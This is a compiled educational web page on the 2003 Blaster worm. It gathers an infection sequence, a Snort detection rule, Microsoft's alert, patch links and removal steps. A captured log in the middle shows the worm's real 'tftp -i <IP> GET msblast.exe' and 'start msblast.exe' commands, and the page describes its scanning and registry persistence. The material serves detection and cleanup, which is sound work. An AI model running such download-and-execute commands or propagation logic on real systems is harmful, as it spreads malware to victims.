Softpanorama
(slightly skeptical)
Open Source Software Educational Society
May the source be with you, but remember the KISS principle ;-)
Softpanorama Search
|
Softpanorama |
May the source be with you, but remember the KISS principle ;-)
Softpanorama Search
|
The Blaster worm uses a series of components to successfully infect a host. The first component is a publicly available RPC DCOM exploit that binds a system level shell to port 4444. This exploit is used to initiate a command channel between the infecting agent and the vulnerable target. Once the target is successfully compromised, the worm transmits the msblast.exe executable (the main body of the worm) via TFTP to infect the host. The payload used in the public DCOM exploit, as well as the TFTP functionality, are both encapsulated within msblast.exe.78
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
Infection sequence:
SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
this causes a remote shell on port 4444 at the TARGET
the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,
the target will now connect to the tftp server at the SOURCE.
|
|||||||
The existing RPC/DCOM signature in freeware Snort intrusion detection system will detect this worm as it enters a monitored network. Symantec provided another Snort signature, which is listed below (see their analysis report here):
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \
(msg:"DCE RPC Interface Buffer Overflow Exploit"; \
content:"|00 5C 00 5C|"; \
content:!"|5C|"; within:32; \
flow:to_server,established; \
reference:bugtraq,8205; rev: 1; )
Download details MS03-026 Scanning Tool Microsoft has released a tool, KB 823980scan.exe, that can be used to scan networks to identify host computers that do not have the 823980 Security Patch (MS03-026) installed.
For additional information about the Security Patch (MS03-026), Please review Knowledge Base Article 823980 in the Microsoft Knowledge Base.
sniffing my connection i detected a new worm propagating by the rpc dcom overflow
i saw a couple of connection trying to connect on my port 4444 so i did a little listen on it
---------
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i .... and it continues...
------------------------------
so i got into one of those computer with the rpc overflow and download MSBLAST.exe
i installed it
i begins the scan by 108.41.62.1-255 on port 135
and it put itself into the registry on the startup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update "msblast.exe"
Worm exploits the DCOM RPC vulnerability in Microsoft Windows described in MS Security Bulletin MS03-026.
Written in C using the LCC compiler. The worm is a Windows PE EXE file about 6KB (compressed via UPX - 11KB when decompressed). Lovesan downloads and attempts to run a file named msblast.exe.
The text is as follows:I just want to say LOVE YOU SAN!!
billy gates why do you make this possible? Stop making money and fix your software!!Symptoms of Infection:
MSBLAST.Exe in the Windows system32 folder.
Error message: RPC service failure. This causes the system to reboot.
How the Worm Spreads
Lovesan registers itself in the autorun key when the system reboots and launches itself every time the computer reboots in the future:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run
windows auto update="msblast.exe"
The worm then scans IP addresses, attempting to connect to 20 random IP addresses and infect any vulnerable machines. Lovesan sleeps for 1.8 seconds and scans the next 20 IP addresses. Lovesan scans IP addresses following one of the patterns below:
In 3 out of 5 cases Lovesan selects random base IP addresses (A.B.C.D) where D is equal to 0, while A, B and C are random numbers between 0 and 255.
In the remaining 2 out of 5 cases Lovesan scans the subnet and gets the local IP address of the infected machine, extracts values A and B from it and sets D to 0. Then the worm extracts the C value.
If C is less than or equal to 20, then Lovesan does not modify C. Thus, if the local IP address is 207.46.14.1 the worm will scan IP addresses starting from 207.46.14.0
If C is greater than 20, than Lovesan selects a random value between C and C-19. Thus, if the IP address of the infected machine is 207.46.134.191 the worm will scan IP addresses 207.46.{115-134}.0
The worm sends a buffer-overrun request to vulnerable machines via TCP port 135. The newly infected machine then initiates the command shell on TCP port 4444.
Lovesan runs the thread that opens the connection on port 4444 and waits for FTP 'get' request from the victim machine. The worm then forces the victim machine to sends the 'FTP get' request. Thus the victim machine downloads the worm from the infected machine and runs it. The victim machine is now also infected.
Configure TCP/IP security on Windows 2000:
--Select "Network and Dial-up Connections" in the control panel.
--Right-click the interface you use to access the Internet, and then click "Properties".
--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".
--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".
--Click the "Options" tab.
--Click "TCP/IP filtering", and then click "Properties".
--Select the "Enable TCP/IP Filtering (All adapters)" check box.
--There are three columns with the following labels:
TCP Ports
UDP Ports
IP Protocols
--In each column, you must select the "Permit Only" option. >
--Click OK.
PSS Security Response Team Alert - New Worm: W32.Blaster.worm
SEVERITY: CRITICAL
DATE: Updated August 12, 2003
PRODUCTS AFFECTED: Windows XP, Windows 2000, Windows Server 2003, Windows NT 4.0, NT 4.0 Terminal Services Edition
WHAT IS IT?
The Microsoft Product Support Services Security Team is issuing this alert to inform customers about a new worm named W32.Blaster.Worm which is spreading in the wild. This virus is also known as: W32/Lovsan.worm (McAfee), WORM_MSBLAST.A (Trendmicro), Win32.Posa.Worm (Computer Associates). Best practices, such as applying security patch MS03-026 should prevent infection from this worm.
Date discovered: August 11, 2003. Customers who had previously applied the security patch MS03-026 are protected. To determine if the virus is present on your machine see the technical details below.
IMPACT OF ATTACK:
Spread through open RPC ports. Customer's machine gets re-booted or the file "msblast.exe" exists on customer's system.
TECHNICAL DETAILS:
This worm scans a random IP range to look for vulnerable systems on TCP port 135. The worm attempts to exploit the DCOM RPC vulnerability patched by MS03-026.
Once the Exploit code is sent to a system, it downloads and executes the file MSBLAST.EXE from a remote system via TFTP. Once run, the worm creates the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill
Symptoms of the virus: Some customers may not notice any symptoms at all. A typical symptom is the system is rebooting every few minutes without user input. Customers may also see:
- Presence of unusual TFTP* files
- Presence of the file msblast.exe in the WINDOWS SYSTEM32 directoryTo detect this virus, search for msblast.exe in the WINDOWS SYSTEM32 directory or download the latest anti-virus software signature from your anti-virus vendor and scan your machine.
For additional information on recovering from this attack please contact your preferred anti-virus vendor.
RECOVERY:
Many Antivirus companies have written tools to remove the known exploit associated with this particular worm. To download the removal tool from your antivirus vendor follow procedures outlined below.
For Windows XP
First, enable the built in firewall such as Internet Connection Firewall (ICF) in Windows XP: http://support.microsoft.com/?id=283673
--In Control Panel, double-click "Networking and Internet Connections", and then click "Network Connections".
--Right-click the connection on which you would like to enable ICF, and then click "Properties".
--On the Advanced tab, click the box to select the option to “Protect my computer or network”.
Second, download the MS03-026 security patch from Microsoft:
Windows XP (32 bit)
Windows XP (64 bit)
Third, install or update your antivirus signature software
Then, download the worm removal tool from your antivirus vendor.
For Windows 2000 systems, where Internet Connection Firewall (ICF) is not available, the following steps will help block the affected ports so that the system can be patched. These steps are based on a modified excerpt from the article; HOW TO: Configure TCP/IP Filtering in Windows 2000. http://support.microsoft.com/?id=309798
1. Configure TCP/IP security on Windows 2000:
--Select "Network and Dial-up Connections" in the control panel.
--Right-click the interface you use to access the Internet, and then click "Properties".
--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".
--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".
--Click the "Options" tab.
--Click "TCP/IP filtering", and then click "Properties".
--Select the "Enable TCP/IP Filtering (All adapters)" check box.
--There are three columns with the following labels:
TCP Ports
UDP Ports
IP Protocols
--In each column, you must select the "Permit Only" option. >
--Click OK.
2. Download the MS03-026 security patch for Windows 2000 from Microsoft at: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe
3. Install or update your antivirus signature software
4. Then, download the worm removal tool from your antivirus vendor.
For additional details on this worm from anti-virus software vendors participating in the Microsoft Virus Information Alliance (VIA) please visit the following links:
Please contact your Antivirus Vendor for additional details on this virus.
PREVENTION:
Turn on Internet Connection Firewall (Windows XP or Windows Server 2003) or use a third party firewall to block TCP ports 135, 139, 445 and 593; UDP port 135, 137,138;also UDP 69 (TFTP)and TCP 4444 for remote command shell. To enable the Internet Connection Firewall in Windows: http://support.microsoft.com/?id=283673
- In Control Panel, double-click Networking and Internet Connections, and then click Network Connections.
- Right-click the connection on which you would like to enable ICF, and then click Properties.
- On the Advanced tab, click the box to select the option to Protect my computer or network.
This worm utilizes a previously-announced vulnerability as part of its infection method. Because of this, customers must ensure that their computers are patched for the vulnerability that is identified in Microsoft Security Bulletin MS03-026. http://www.microsoft.com/technet/security/bulletin/MS03-026.asp.
Install the patch MS03-026 from Windows Update:
Windows NT 4 Server & Workstation
http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE
Windows NT 4 Terminal Server Edition
http://download.microsoft.com/download/4/6/c/46c9c414-19ea-4268-a430-53722188d489/Q823980i.EXE
Windows 2000
Windows XP (32 bit)
Windows XP (64 bit)
Windows 2003 (32 bit)
Windows 2003 (64 bit)
As always, please make sure to use the latest Anti-Virus detection from your Anti-Virus vendor to detect new viruses and their variants.
RELATED KB'S:
http://support.microsoft.com/?kbid=826955RELATED MICROSOFT SECURITY BULLETINS:
http://www.microsoft.com/technet/security/bulletin/MS03-026.aspRELATED LINKS:
http://www.microsoft.com/security/incident/blast.aspIf you have any questions regarding this alert please contact your Microsoft representative or 1-866-727-2338 (1-866-PCSafety) within the US, outside of the US please contact your local Microsoft Subsidiary.
PSS Security Response Team
CERT Advisory CA-2003-20 W32/Blaster worm
Microsoft RPC Exploit and W32.Blaster.Worm
Network Associates:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100547
Trend Micro:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Symantec:
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
Computer Associates:
http://www3.ca.com/virusinfo/virus.aspx?ID=36265
For more information on Microsoft’s Virus Information Alliance please visit
this link:
http://www.microsoft.com/technet/security/virus/via.asp
1. Delete the registry key found at:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "windows auto update"
String: "msblast.exe"
2. Look for "msblast.exe" running in the task manager. If it is
running, kill the process.
3. Delete the file "msblast.exe" found in %systemroot%\system32\msblast.exe
You can also use a
free clean-up tool provided by Symantec.
Shavlik Technologies also provides a free version of its
HFNetChk Lite software,
which can scan your entire network for missing Microsoft patches and automate
patch installation for up to 50 systems.
Tobias E. Schmidt of Winona University posted
two visual basic
scripts that can be used to help control the worm while patches are rolled
out and to help clean up infected systems. The scripts can be inserted
into computer startup and user logon sequences using Group Policy.
The number of target systems scanned for an open port 135, which the worm uses
to spread, have been considerably higher since Microsoft released is security
bulletin on July 16. Trends reveal that since that time the number of hosts
performing scans has increased dramatically. Where before July 16 there were
roughly 900 to 1100 systems scanning for port 135, as of August 11 there were
over 58,900 systems performing scans, many of which are probably systems
infected with the new worm.
To monitor the situation be sure to visit
Incidents.org or
Dshield.org regularly, where you can
learn more about the worm, as well as learn about general
trends and patterns of many different intrusion attempts.
On Monday, a few minutes after news of the
new worm spread to the Bugtraq mailing list, an anonymous user with an email
address from a Hotmail account posted a message to the list which contains link
to another set of exploit code for the RPC/DCOM problem. The zip file contains a
copy of the code, a compiled executable, as well as a macro file that can used
once the exploit inserts a backdoor command shell into an infected the system.
The code, called KaHT II, is capable of spreading itself to other systems
rapidly.
You can also read more about the RPC/DCOM vulnerability in other articles on our
Web site, and find links to Snort and its accessories list below:
Buffer Overrun In RPC Interface Could Allow Code
Execution
More
technical details, how to defend your systems, and user reports regarding patch
installation issues:
UPDATE: MS Patches Leave Systems Insecure and Break
Services
Commentary and other details:
Are You Vulnerable to RPC Exploitation?
Commentary and
other details:
The RPC/DCOM Bugs: How Bad Are They?
Snort IDS - Win32 Version; and IDSCenter
(GUI for Snort)
Download Snort for Win32 platforms
Download IDSCenter
(from Engage Security)
Download the latest Snort Rulesets
Read Windows & .NET
Magazine articles about Snort
Copyright © 1996-2009 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. Submit comments This document is an industrial compilation designed and created exclusively for educational use and is placed under the copyright of the Open Content License(OPL). Site uses AdSense so you need to be aware of Google privacy policy. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
Disclaimer:
Last modified: June 02, 2008